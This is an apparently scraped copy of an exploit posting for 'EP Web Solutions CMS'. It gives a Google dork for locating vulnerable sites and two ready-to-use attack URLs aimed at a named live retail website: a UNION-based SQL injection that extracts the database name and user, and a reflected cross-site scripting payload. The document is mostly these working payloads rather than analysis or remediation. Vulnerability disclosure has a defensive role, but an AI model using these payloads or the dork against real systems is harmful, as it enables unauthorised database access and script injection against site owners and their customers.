Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020090139

Below is a copy:

EP Web Solutions CMS SQL Injection and XSS Vulnerability
#Exploit Title: EP Web Solutions CMS SQL Injection and XSS Vulnerability
#Date: 2020-09-28
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: evergreenparkweb.com
#Google Dork: intext:"EPweb " or " Evergreen Park Web"
#Category: webapps
#Tested On: Windows 10, Firefox
#Software Link: evergreenparkweb.com
 
SQL Injection
Demo: https://www.martinellischildrenswear.com/product_details.php?ID=-890%27%20UNION%20SELECT%201,database()%20,user(),4,5,6,7,8,9,10,11,12,13,14--%20-
################################################################################
Cross Site Scripting (XSS)
Demo: https://www.martinellischildrenswear.com/shop.php?search=%22/%3E%3Cscript%3Ealert`PywebSecurity`%3C/script%3E


********************************************************* 
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************